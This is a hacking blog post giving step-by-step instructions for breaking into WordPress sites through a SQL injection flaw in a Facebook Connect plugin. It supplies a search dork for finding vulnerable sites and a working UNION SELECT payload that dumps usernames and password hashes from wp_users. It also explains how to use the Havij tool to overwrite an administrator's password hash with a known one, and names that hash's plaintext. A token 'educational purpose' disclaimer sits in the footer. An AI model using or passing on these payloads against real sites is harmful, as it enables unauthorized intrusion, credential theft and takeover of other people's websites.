How to hack wordpress websites | SQli vulnerability & exploit



There is so many Pepoles using Facebook Connect Wordpress plugin for their blogs. They think it's cool. But it could be a Big Security hole. Here's the way to hack these sites.Step 1 : http://www.google.com

Step 2:Now enter this dork to find sites with security hole..


inurl:"fbconnect_action=myhome"


 Step 3: You will find many sites, Select the site which you are comfortable with. 

You will find something like that.


Step 4: Now replace 
?fbconnect_action=myhome&userid=

with this
 
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 5: Now you have the User name and Password.


Step 6: The password is encrypted with Wordpress md5 (blowfish). You need to decode this. 


Step 7: Then find the administrator panel out. Normally it should be in 

www.victrimsite.com/wp-admin
or 
www.victrimsite.com/wp-login.php







Note: Decoding this type of password may take a big time.

So you here is another way to hack the password.....


Step 1: Open Havij and paste the blog url you are going to hack..

Example: 

http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 2: Now find Databases, Tables.

Step 3: Select wp-users then find tick on all columns. Then click on Get Data.

Step 4: You will find something like that..




Step 5: Now select any user and change the user_pass to 

$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/

Step 6: Now login with the password hackintruths .





credits to: Devilscafe.in


Responses

0 Respones to "How to hack wordpress websites | SQli vulnerability & exploit"

Post a Comment

Instructions

THIS WEBSITE IS BUILT BY ME FOR EDUCATIONAL PURPOSE. IF YOU USE THIS INFORMATION TO HARM ANY SUBSTANCE OR COMMUNITY PERSONALLY AND GOT CAUGHT THAN WE ARE NOT RESPONSIBLE, EXPAND YOUR INFORMATION,SHARE UR THOUGHTS AND KNOWLEDGE WITH US. MAIL ME ON RRRICKY.SAINI2@GMAIL.COM

Contributors

Stay Connected

DMCA.com
Return to top of page Copyright © 2011 | Platinum Theme Converted into Blogger Template by devzcyberarena